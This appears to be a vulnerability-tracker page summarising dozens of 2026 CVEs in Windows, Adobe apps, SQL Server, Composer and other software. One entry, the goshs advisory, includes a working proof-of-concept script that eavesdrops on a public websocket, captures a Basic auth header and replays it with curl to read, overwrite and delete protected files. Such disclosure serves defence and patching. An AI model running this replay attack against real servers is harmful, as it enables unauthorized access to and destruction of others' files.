Skip to main content
CVE-2026-27919 HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows Universal Plug and Play (UPnP) Device Host affects all supported Windows versions from Server 2012 through Windows 11 26H1 and Server 2025. Authenticated local attackers with low privileges can exploit an untrusted pointer dereference (CWE-822) to achieve complete system compromise with high impact to confidentiality, integrity, and availability. Microsoft has released patches for all affected versions. No public exploit identified at time of analysis, thoug

Information Disclosure Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27915 HIGH PATCH Exploit Unlikely This Week

Local privilege escalation via use-after-free memory corruption in Windows Universal Plug and Play (UPnP) Device Host affects all supported Windows versions from Server 2012 through Windows 11 26H1. Authenticated local attackers with low privileges can exploit this CWE-416 flaw to gain SYSTEM-level access with low attack complexity (CVSS:3.1 AV:L/AC:L/PR:L). Vendor-released patches are available across all affected Windows 10, Windows 11, and Windows Server product lines. No public exploit code

Denial Of Service Use After Free Memory Corruption Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32153 HIGH PATCH Exploit Unlikely This Week

Use-after-free in Microsoft Windows Speech component enables local privilege escalation to SYSTEM on Windows 10 (versions 1809, 21H2, 22H2) and Windows 11 (versions 22H3 through 26H1). Authenticated local attackers with low privileges can exploit memory corruption to gain full system control with low attack complexity and no user interaction required. CVSS 7.8 (High). Vendor-released patches available for all affected versions. No public exploit identified at time of analysis, though the straigh

Denial Of Service Use After Free Memory Corruption Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32090 HIGH PATCH This Week

Local privilege escalation in Windows Speech Brokered API allows authenticated users with low privileges to gain SYSTEM-level access via race condition exploitation. Affects all supported Windows 10, Windows 11, and Windows Server versions (2016-2025). Microsoft released patches in May 2025 across 17 product variants. Despite CVSS 7.8 severity, EPSS score is low (0.04%, 12th percentile) indicating minimal observed exploitation activity. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.

Information Disclosure Race Condition Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32089 HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows Speech Brokered API allows authenticated users to gain SYSTEM-level access via use-after-free memory corruption. All supported Windows 10, Windows 11, and Windows Server versions (2016-2025) are affected. Microsoft released patches in their April 2026 security update cycle. EPSS score of 0.04% (12th percentile) indicates low exploitation likelihood in the wild, and no active exploitation or public exploit code has been identified at time of analysis.

Denial Of Service Use After Free Memory Corruption Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27927 HIGH PATCH Exploit Unlikely This Week

Privilege escalation in Windows Projected File System across Windows 10, 11, and Server versions allows authenticated local users to gain SYSTEM-level privileges by exploiting a race condition during concurrent file system operations. Affects all currently supported Windows versions from Server 2019 through Windows 11 26H1. Microsoft released patches in their latest security update cycle. No public exploit identified at time of analysis, though the low attack complexity (AC:L) and minimal privil

Information Disclosure Race Condition Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27918 HIGH PATCH Exploit Unlikely This Week

Windows Shell privilege escalation affects Windows 10 (1809+), Windows 11 (all versions through 26H1), and Windows Server 2019-2025 via a race condition vulnerability (CWE-362). Local authenticated attackers with low-privilege access can exploit concurrent execution flaws to gain SYSTEM-level privileges with low attack complexity and no user interaction required (CVSS 7.8). Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though t

Information Disclosure Race Condition Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32164 HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows User Interface Core across Windows 10, 11, and Server 2016-2025 allows low-privileged authenticated users to gain elevated system access via a race condition vulnerability. Attack complexity is high (AC:H), requiring precise timing exploitation of shared resource synchronization flaws. Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though the local attack vector and authenticated requirement

Information Disclosure Race Condition Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32163 HIGH PATCH This Week

Privilege escalation in Windows User Interface Core across Windows 10 (1809-22H2), Windows 11 (22H3-26H1), and Windows Server (2019-2025) allows authenticated local attackers to gain elevated privileges via race condition exploitation. Vendor-released patches available for all affected versions. No public exploit identified at time of analysis. CVSS 7.8 (high) with local attack vector and high complexity (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C) indicates significant real-world risk in multi-user environments where low-privilege users can access affected systems.

Information Disclosure Race Condition Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27911 HIGH PATCH This Week

Race condition in Windows User Interface Core (MSRC patch CVE-2026-27911) enables low-privileged authenticated attackers to elevate privileges to SYSTEM level on Windows 10, Windows 11, and Windows Server 2016-2025 systems. The flaw stems from improper synchronization when multiple threads concurrently access shared resources in the UI subsystem, creating a time-of-check-time-of-use (TOCTOU) window exploitable for privilege escalation. Patch available per vendor advisory. No public exploit ident

Information Disclosure Race Condition Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32165 HIGH PATCH Exploit Unlikely This Week

Local privilege escalation in Windows User Interface Core across Windows 10, 11, and Server 2019-2025 allows low-privileged authenticated attackers to achieve SYSTEM-level access via use-after-free memory corruption. The vulnerability requires high attack complexity and local access but enables container escape (scope change) with full confidentiality, integrity, and availability impact. Vendor-released patches are available for all affected versions. No public exploit identified at time of analysis, though the use-after-free primitive is a well-understood exploitation technique.

Denial Of Service Use After Free Memory Corruption Microsoft
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27292 HIGH This Week

Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute malicious code with current user privileges by tricking victims into opening specially crafted files. This use-after-free memory corruption vulnerability requires no authentication but depends on user interaction. No confirmed active exploitation (not in CISA KEV) or public proof-of-concept identified at time of analysis, though the local attack vector and user interaction requirement reduce immediate remote threat surface compared to network-accessible vulnerabilities.

Denial Of Service RCE Memory Corruption Adobe Use After Free
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27283 HIGH This Week

Arbitrary code execution in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier allows unauthenticated attackers to execute malicious code with current user privileges through maliciously crafted files. The use-after-free vulnerability requires user interaction (opening a weaponized InDesign file) but offers high impact across confidentiality, integrity, and availability. EPSS data not provided; no public exploit identified at time of analysis. Exploitation likelihood increased by low attack complexity (CVSS AC:L) requiring only basic social engineering to deliver malicious files.

Denial Of Service Use After Free RCE Memory Corruption Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27298 HIGH This Week

Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute code with current user privileges via maliciously crafted files. The type confusion vulnerability (CWE-843) requires user interaction to open a weaponized document. CVSS 7.8 (High) reflects significant impact (full confidentiality, integrity, availability compromise) once exploitation succeeds. No public exploit identified at time of analysis, though the local attack vector and user interaction requirement reduce immediate remote exploitation risk.

RCE Memory Corruption Adobe
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27297 HIGH This Week

Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute code in user context by delivering malicious FrameMaker documents that trigger integer underflow during file parsing. Attack requires social engineering to convince targets to open crafted files. No public exploit identified at time of analysis, though CVSS 7.8 severity reflects high impact across confidentiality, integrity, and availability if successfully exploited.

Integer Overflow RCE Adobe
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27296 HIGH This Week

Arbitrary code execution in Adobe FrameMaker 2022.8 and earlier allows local attackers to execute malicious code with current user privileges through specially crafted files exploiting an integer underflow. Attack requires user interaction (opening a malicious file). CVSS 7.8 (High) reflects local attack vector with low complexity. No public exploit identified at time of analysis, and EPSS data not provided. Vendor advisory available at Adobe PSIRT (APSB26-36).

Integer Overflow RCE Adobe
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27295 HIGH This Week

Out-of-bounds write in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution when users open specially crafted malicious files. The vulnerability achieves full confidentiality, integrity, and availability impact (CVSS 7.8 HIGH) but requires local access and user interaction, limiting immediate risk. No public exploit identified at time of analysis, and exploitation requires social engineering to deliver the malicious file to victims.

Buffer Overflow RCE Memory Corruption Adobe
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27294 HIGH This Week

Out-of-bounds read in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution when users open malicious crafted files. Exploitation requires local access and user interaction (CVSS 7.8, AV:L/UI:R), allowing attackers to execute code with current user privileges and achieve high confidentiality, integrity, and availability impact. EPSS data not available; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis. Adobe has released security bulletin APSB26-36 addressing this vulnerability.

Buffer Overflow Information Disclosure Adobe
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27293 HIGH This Week

Heap-based buffer overflow in Adobe FrameMaker 2022.8 and earlier enables arbitrary code execution with high integrity and confidentiality impact when users open specially crafted malicious files. Attack requires local access and user interaction (CVSS 7.8, AV:L/UI:R), limiting remote exploitation scenarios. No public exploit identified at time of analysis. EPSS data not available, and vulnerability not listed in CISA KEV, suggesting exploitation remains theoretical despite the high CVSS score.

Heap Overflow Buffer Overflow RCE Adobe
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34631 HIGH This Week

Arbitrary code execution in Adobe InCopy 20.5.2, 21.2 and earlier allows unauthenticated local attackers to execute malicious code with the victim's privileges through a specially crafted file. The vulnerability stems from an out-of-bounds write (CWE-787) triggering memory corruption. Exploitation requires the victim to open a malicious document, making this a viable social engineering vector. No public exploit identified at time of analysis, though the vulnerability's local attack vector and user interaction requirement moderately constrain immediate risk.

Buffer Overflow RCE Memory Corruption Incopy
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34630 HIGH This Week

Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier versions enables arbitrary code execution with victim's privileges when processing maliciously crafted files. Attack requires local access and user interaction (opening a weaponized file). CVSS 7.8 (High) reflects significant impact but local-only attack vector. No public exploit identified at time of analysis, and exploitation probability remains moderate given the user interaction requirement and local access constraint.

Heap Overflow Buffer Overflow RCE Bridge
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34618 HIGH This Week

Arbitrary code execution in Adobe Illustrator 30.2, 29.8.5 and earlier versions allows unauthenticated local attackers to execute malicious code with current user privileges via crafted file exploitation. The vulnerability requires user interaction (opening a malicious file) but has low attack complexity once delivered. No public exploit identified at time of analysis, with EPSS data unavailable for risk quantification. The out-of-bounds write flaw affects memory management during file parsing operations.

Buffer Overflow RCE Memory Corruption Illustrator
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27313 HIGH This Week

Arbitrary code execution in Adobe Bridge 16.0.2, 15.1.4 and earlier allows local attackers to execute malicious code with current user privileges through specially crafted files. CVSS 7.8 (High) with EPSS data not available. No public exploit identified at time of analysis. Exploitation requires victim to open a malicious Bridge file, making this a realistic threat for targeted attacks using phishing or social engineering delivery methods.

Heap Overflow Buffer Overflow RCE Bridge
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27289 HIGH This Week

Out-of-bounds read in Adobe Photoshop Desktop 27.4 and earlier enables arbitrary code execution when users open malicious files. Attackers can read beyond allocated memory boundaries during file parsing to execute code with current user privileges. CVSS 7.8 (High) reflects local attack vector requiring user interaction. No public exploit identified at time of analysis, though exploitation requires only low complexity once a victim opens the crafted file.

Buffer Overflow Information Disclosure Photoshop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34628 HIGH This Week

Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high impact to confidentiality, integrity, and availability when users open malicious files. The vulnerability requires local access and user interaction (opening a crafted document), with no authentication barriers (CVSS PR:N). No public exploit identified at time of analysis, and CISA SSVC framework rates this as non-exploited with total technical impact but not automatable, indicating targeted attack potential rather than mass exploitation risk.

Heap Overflow Buffer Overflow RCE Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34629 HIGH This Week

Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high integrity and confidentiality impact when users open specially crafted malicious files. No public exploit identified at time of analysis. CVSS 7.8 reflects local attack vector requiring user interaction but no authentication, with complete system compromise potential in user context. EPSS risk data not available; exploitation requires social engineering to deliver malicious InDesign document.

Heap Overflow Buffer Overflow RCE Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-34627 HIGH This Week

Heap-based buffer overflow in Adobe InDesign Desktop versions 20.5.2, 21.2 and earlier enables arbitrary code execution with high confidentiality, integrity, and availability impact when users open malicious files. No public exploit identified at time of analysis. Attack requires local access and user interaction (opening a crafted file), with low attack complexity and no authentication requirements (CVSS:3.1 AV:L/AC:L/PR:N/UI:R). EPSS risk data not available; vulnerability enables complete system compromise in user context.

Heap Overflow Buffer Overflow RCE Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27284 HIGH This Week

Out-of-bounds read in Adobe InDesign Desktop versions 20.5.2, 21.2, and earlier enables arbitrary code execution when users open malicious files. Attack requires local access and user interaction (CVSS AV:L/UI:R) but no authentication (PR:N), allowing attackers with file delivery capability to execute code as the victim user. No public exploit identified at time of analysis, though the vulnerability class (CWE-125 out-of-bounds read) is well-understood and commonly weaponized in document processors.

Buffer Overflow Information Disclosure Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27238 HIGH This Week

Heap-based buffer overflow in Adobe InDesign Desktop 20.5.2, 21.2 and earlier enables arbitrary code execution with high confidentiality, integrity, and availability impact. Attack requires local access and user interaction (victim opens malicious InDesign file), with low attack complexity and no authentication barriers. CVSS 7.8 reflects significant impact once social engineering succeeds. No CISA KEV listing indicates no confirmed active exploitation at time of analysis. Adobe has published security advisory APSB26-32 addressing this vulnerability.

Buffer Overflow RCE Heap Overflow Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27291 HIGH This Week

Arbitrary code execution in Adobe InDesign Desktop versions through 21.2 allows unauthenticated attackers to execute malicious code with full user privileges by exploiting an out-of-bounds write vulnerability via a specially crafted InDesign file. Attack requires local access and user interaction to open the malicious document. No public exploit identified at time of analysis, though CVSS 7.8 reflects high impact if successfully exploited. Adobe has released security bulletin APSB26-32 addressing this memory corruption flaw.

Buffer Overflow RCE Memory Corruption Indesign Desktop
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-33023 HIGH PATCH This Week

Use-after-free in libsixel's gdk-pixbuf2 loader enables local attackers to achieve code execution via crafted images. Affects libsixel versions through 1.8.7 when compiled with --with-gdk-pixbuf2 option. The vulnerability stems from inconsistent memory management in load_with_gdkpixbuf(), which manually frees reference-counted frame objects, leaving dangling pointers that callbacks can access post-cleanup. CVSS 7.8 (High) with local attack vector requiring user interaction. Fixed in version 1.8.7-r1. No confirmed active exploitation (CISA KEV), though proof-of-concept feasibility is high given the deterministic nature of the memory corruption.

Information Disclosure RCE Memory Corruption Buffer Overflow Use After Free +1
NVD GitHub
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27287 HIGH This Week

Out-of-bounds read in Adobe InCopy 20.5.2, 21.2 and earlier allows arbitrary code execution when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction to open a weaponized document, which then triggers memory disclosure leading to code execution in user context. No public exploit identified at time of analysis. EPSS data not available, but the local-only attack vector and mandatory user interaction substantially reduce real-world risk compared to remotely exploitable flaws.

Buffer Overflow Information Disclosure Incopy
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-40176 HIGH PATCH GHSA This Week

Command injection in Composer's Perforce integration allows arbitrary code execution when processing malicious composer.json files. Attackers controlling VCS repository configuration can inject shell commands via unsanitized Perforce connection parameters (port, user, client), which execute even without Perforce installed. CVSS 7.8 (High) with local attack vector requiring user interaction. Affects Composer versions before 2.2.27 and 2.9.6. Exploitation requires victim to run Composer commands on attacker-controlled project root composer.json, limiting scope to supply chain or social engineering scenarios. No KEV listing or public POC identified at time of analysis, but exploitation barrier is low once malicious config is introduced.

Command Injection
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27312 HIGH This Week

Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier allows arbitrary code execution with user privileges when processing malicious files. CVSS 7.8 (High) reflects the local attack vector requiring victim interaction to open a crafted file. No public exploit identified at time of analysis, with SSVC framework rating this as non-automatable but capable of total technical impact. Exploitation requires social engineering to deliver the malicious file to the target user.

Heap Overflow Buffer Overflow RCE Bridge
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27311 HIGH This Week

Heap-based buffer overflow in Adobe Bridge 16.0.2, 15.1.4, and earlier versions enables arbitrary code execution with user privileges when processing maliciously crafted files. CVSS 7.8 reflects high impact across confidentiality, integrity, and availability, requiring local access and user interaction. CISA SSVC framework categorizes this as non-automatable with total technical impact. No public exploit identified at time of analysis, and vendor has released security advisory APSB26-39 addressing the vulnerability.

Heap Overflow Buffer Overflow RCE Bridge
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-27310 HIGH This Week

Arbitrary code execution via heap-based buffer overflow in Adobe Bridge (versions 16.0.2, 15.1.4 and earlier) allows local attackers to execute code in the user's security context by tricking victims into opening specially crafted malicious files. No public exploit identified at time of analysis, with SSVC assessment indicating no current exploitation, non-automatable attack requiring user interaction, and total technical impact upon successful compromise.

Heap Overflow Buffer Overflow RCE Bridge
NVD VulDB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-32176 MEDIUM PATCH Exploit Unlikely This Month

SQL injection in Microsoft SQL Server 2016-2025 allows authenticated high-privilege attackers to elevate privileges locally via improper neutralization of SQL command elements. Affected versions include SQL Server 2016 SP3, 2017, 2019, 2022, and 2025 across multiple cumulative updates and GDR releases. The CVSS 6.7 score reflects the requirement for high-privilege authentication and local attack vector, but the high confidentiality, integrity, and availability impact makes this a material risk f

SQLi Microsoft Sql Server 2016 Service Pack 3 Gdr Microsoft Sql Server 2016 Service Pack 3 Azure Connect Feature Pack Microsoft Sql Server 2017 Cu 31 Microsoft Sql Server 2017 Gdr +6
NVD VulDB
CVSS 3.1
6.7
EPSS
0.1%
CVE-2026-40885 HIGH PATCH GHSA This Week

### Summary goshs leaks file-based ACL credentials through its public collaborator feed when the server is deployed without global basic auth. Requests to `.goshs`-protected folders are logged before authorization is enforced, and the collaborator websocket broadcasts raw request headers, including `Authorization`. An unauthenticated observer can capture a victim's folder-specific basic-auth header and replay it to read, upload, overwrite, and delete files inside the protected subtree. I reproduced this on `v2.0.0-beta.5`, the latest supported release as of April 10, 2026. ### Details The main web UI and collaborator websocket stay public when goshs is started without global `-b user:pass` authentication: - `httpserver/server.go:72-85` only installs `BasicAuthMiddleware()` when a global username or password is configured The vulnerable request is logged before `.goshs` authorization is enforced: - `httpserver/handler.go:277-279` calls `emitCollabEvent()` and `logger.LogRequest()` before the protected file is passed into ACL enforcement - `httpserver/handler.go:291-309` performs folder-level `.goshs` authentication later in `applyCustomAuth()` The collaborator pipeline copies and broadcasts every request header: - `httpserver/collaborator.go:22-46` flattens all request headers, including `Authorization`, into the websocket event and sends them to the hub - `ws/hub.go:77-84` fans the event out live to all connected websocket clients - `ws/hub.go:116-122` replays up to 200 prior HTTP events to newly connected websocket clients via catchup The frontend also makes the leak easier to understand by decoding authorization values: - `assets/js/main.js:627-645` formats and decodes the `Authorization` header for display in the collaborator panel In practice, a victim request such as: ```http GET /ACLAuth/secret.txt Authorization: Basic YWRtaW46YWRtaW4= ``` is visible to any public websocket observer before the protected file's ACL check is enforced. The attacker can then replay the leaked header against the same protected folder and gain the victim's effective access. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_collab_root mkdir -p /tmp/goshs_collab_root/ACLAuth cp integration/keepFiles/goshsACLAuth /tmp/goshs_collab_root/ACLAuth/.goshs printf 'very secret\n' > /tmp/goshs_collab_root/ACLAuth/secret.txt /tmp/goshs_beta5 -d /tmp/goshs_collab_root -p 18096 ``` `Terminal 2` ```bash node - <<'NODE' const ws = new WebSocket('ws://127.0.0.1:18096/?ws'); ws.onmessage = (ev) => console.log(ev.data.toString()); NODE ``` `Terminal 3` ```bash curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -u admin:admin http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' -X PUT --data-binary 'owned' http://127.0.0.1:18096/ACLAuth/pwn.txt curl -s -o /dev/null -w '%{http_code}\n' -H 'Authorization: Basic YWRtaW46YWRtaW4=' 'http://127.0.0.1:18096/ACLAuth/secret.txt?delete' ``` Two terminal commands I ran during local validation: ```bash curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:18096/ACLAuth/secret.txt curl -s -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://127.0.0.1:18096/ACLAuth/secret.txt ``` Observed results from manual verification: - the anonymous request returned `401` - the victim request returned `very secret` - the replayed leaked header also returned `very secret` - the replayed `PUT` returned `200` - the replayed `?delete` returned `200` - the public websocket showed `Authorization":"Basic YWRtaW46YWRtaW4="` PoC Video 1: https://github.com/user-attachments/assets/1347838e-28a0-4c9f-be9f-db7e2938c752 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc4' ``` Observed script result: - `Captured header: Basic YWRtaW46YWRtaW4=` - `Anonymous GET status: 401` - `Replayed-header GET body: very secret` - `Replayed-header PUT status: 200` - `Replayed-header delete status: 200` - `[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree` PoC Video 2: https://github.com/user-attachments/assets/b25648a9-b96c-46b3-9ee4-0ae4cc1c3472 `gosh_poc4` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' FIXTURE='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5/integration/keepFiles/goshsACLAuth' BIN='/tmp/goshs_beta5_collab_leak' PORT='18096' WORKDIR="$(mktemp -d /tmp/goshs-collab-beta5-XXXXXX)" ROOT="$WORKDIR/root" WS_LOG="$WORKDIR/ws.log" GOSHS_PID="" WATCH_PID="" cleanup() { if [[ -n "${WATCH_PID:-}" ]]; then kill "${WATCH_PID}" >/dev/null 2>&1 || true wait "${WATCH_PID}" 2>/dev/null || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true wait "${GOSHS_PID}" 2>/dev/null || true fi } trap cleanup EXIT mkdir -p "${ROOT}/ACLAuth" cp "${FIXTURE}" "${ROOT}/ACLAuth/.goshs" printf 'very secret\n' > "${ROOT}/ACLAuth/secret.txt" echo "[1/6] Building goshs beta.5" (cd "${REPO}" && go build -o "${BIN}" ./) echo "[2/6] Starting goshs without global auth on 127.0.0.1:${PORT}" "${BIN}" -d "${ROOT}" -p "${PORT}" >"${WORKDIR}/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Opening an unauthenticated websocket observer" node - <<'NODE' >"${WS_LOG}" & const ws = new WebSocket('ws://127.0.0.1:18096/?ws'); ws.onopen = () => console.log('OPEN'); ws.onmessage = (ev) => { const msg = ev.data.toString(); console.log(msg); if (msg.includes('Authorization')) process.exit(0); }; setTimeout(() => process.exit(0), 10000); NODE WATCH_PID=$! echo "[4/6] Simulating a victim request with folder credentials" curl -s -u admin:admin "http://127.0.0.1:${PORT}/ACLAuth/secret.txt" >/dev/null wait "${WATCH_PID}" || true WATCH_PID="" LEAKED_HEADER="$(python3 - "${WS_LOG}" <<'PY' import pathlib import re import sys text = pathlib.Path(sys.argv[1]).read_text() m = re.search(r'Basic [A-Za-z0-9+/=]+', text) print(m.group(0) if m else '') PY )" if [[ -z "${LEAKED_HEADER}" ]]; then echo "[ERROR] No leaked Authorization header was captured." >&2 echo "[DEBUG] Websocket output:" >&2 cat "${WS_LOG}" >&2 exit 1 fi echo "[5/6] Replaying the leaked header as the attacker" UNAUTH_CODE="$(curl -s -o /dev/null -w '%{http_code}' "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")" READ_BACK="$(curl -s -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt")" PUT_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" -X PUT --data-binary 'owned' "http://127.0.0.1:${PORT}/ACLAuth/pwn.txt")" DELETE_CODE="$(curl -s -o /dev/null -w '%{http_code}' -H "Authorization: ${LEAKED_HEADER}" "http://127.0.0.1:${PORT}/ACLAuth/secret.txt?delete")" if [[ "${UNAUTH_CODE}" != "401" ]]; then echo "[ERROR] Expected anonymous direct access to fail with 401, got ${UNAUTH_CODE}." >&2 exit 1 fi if [[ "${READ_BACK}" != "very secret" ]]; then echo "[ERROR] Replayed header did not unlock the protected file." >&2 exit 1 fi if [[ "${PUT_CODE}" != "200" ]]; then echo "[ERROR] Expected replayed-header PUT to return 200, got ${PUT_CODE}." >&2 exit 1 fi if [[ "${DELETE_CODE}" != "200" ]]; then echo "[ERROR] Expected replayed-header delete to return 200, got ${DELETE_CODE}." >&2 exit 1 fi if [[ ! -f "${ROOT}/ACLAuth/pwn.txt" ]]; then echo "[ERROR] PUT did not create pwn.txt." >&2 exit 1 fi if [[ -f "${ROOT}/ACLAuth/secret.txt" ]]; then echo "[ERROR] Delete did not remove secret.txt." >&2 exit 1 fi echo "[6/6] Results" echo "Captured header: ${LEAKED_HEADER}" echo "Anonymous GET status: ${UNAUTH_CODE}" echo "Replayed-header GET body: ${READ_BACK}" echo "Replayed-header PUT status: ${PUT_CODE}" echo "Replayed-header delete status: ${DELETE_CODE}" echo "[RESULT] VULNERABLE: public collaborator feed leaked ACL credentials that unlocked the protected subtree" ``` ### Impact This issue is a sensitive information disclosure that becomes an authentication bypass against `.goshs`-protected content. Any unauthenticated observer who can access the public collaborator websocket can steal folder-level basic-auth credentials from a victim request and immediately reuse them to read, upload, overwrite, or delete files inside the protected subtree. Deployments that rely on public goshs access with selective `.goshs`-protected subfolders are directly exposed. ### Remediation Suggested fixes: 1. Never store or broadcast sensitive headers such as `Authorization`, `Cookie`, or `Proxy-Authorization` in collaborator events. 2. Move collaborator logging until after access-control checks, and log only minimal metadata instead of raw headers and bodies. 3. Protect the collaborator websocket and panel with the same or stronger authentication boundary as the resources being observed.

Authentication Bypass Information Disclosure
NVD GitHub
CVSS 4.0
7.7
EPSS
0.1%
CVE-2026-27913 HIGH PATCH Exploit Likely This Week

BitLocker encryption bypass in Windows Server 2012 through 2022 enables local attackers with physical access to circumvent disk encryption protections without authentication. The vulnerability affects all Server Core and standard editions across ten years of Windows Server releases. Patch available per Microsoft Security Response Center (MSRC-2026-27913). No public exploit identified at time of analysis, but the local attack vector (AV:L) with no authentication requirement (PR:N) indicates high risk in scenarios where physical device access is possible, such as lost/stolen servers or insider threats.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
7.7
EPSS
0.1%
CVE-2026-34619 HIGH This Week

Path traversal in Adobe ColdFusion 2023.18, 2025.6 and earlier allows authenticated remote attackers to bypass security controls and cause high availability impact through unauthorized file system access. CVSS 7.7 (High) reflects network-accessible attack vector with low complexity requiring only low-privilege authentication and scope change indicating impact beyond vulnerable component. No active exploitation (CISA KEV) or public POC identified at time of analysis, but zero-interaction exploitation pathway and vendor security advisory publication (APSB26-38) indicate concrete threat requiring prompt remediation.

Path Traversal Coldfusion
NVD VulDB
CVSS 3.1
7.7
EPSS
0.1%
CVE-2026-32167 MEDIUM PATCH Exploit Unlikely This Month

SQL injection in Microsoft SQL Server 2016-2025 allows authenticated high-privilege attackers to elevate privileges locally through improper neutralization of special elements in SQL commands. Affected versions span SQL Server 2016 SP3 through 2025, with patch available from Microsoft. Attack requires local access and high-privilege credentials (PR:H in CVSS vector), limiting real-world impact to insider threats or compromised administrative accounts; CVSS 6.7 reflects high confidentiality, integrity, and availability impact but constrained by authentication and local-only attack vector.

SQLi Microsoft Sql Server 2016 Service Pack 3 Gdr Microsoft Sql Server 2016 Service Pack 3 Azure Connect Feature Pack Microsoft Sql Server 2017 Cu 31 Microsoft Sql Server 2017 Gdr +6
NVD VulDB
CVSS 3.1
6.7
EPSS
0.1%
CVE-2026-40683 HIGH PATCH GHSA This Week

OpenStack Keystone's LDAP identity backend grants authentication access to disabled user accounts due to improper string-to-boolean conversion logic. Versions 8.0.0 through 28.0.0 fail to convert LDAP-disabled status into boolean values when user_enabled_invert is False (default), causing disabled accounts to authenticate as enabled. This affects all LDAP-backed Keystone deployments without specific configuration overrides. CVSS 7.7 with changed scope (S:C) indicates potential cross-tenant privilege issues. EPSS data not available; no public exploit identified at time of analysis, though the logic flaw is straightforward to trigger with valid low-privilege credentials.

Information Disclosure Memory Corruption Python Red Hat
NVD VulDB
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-27282 HIGH This Week

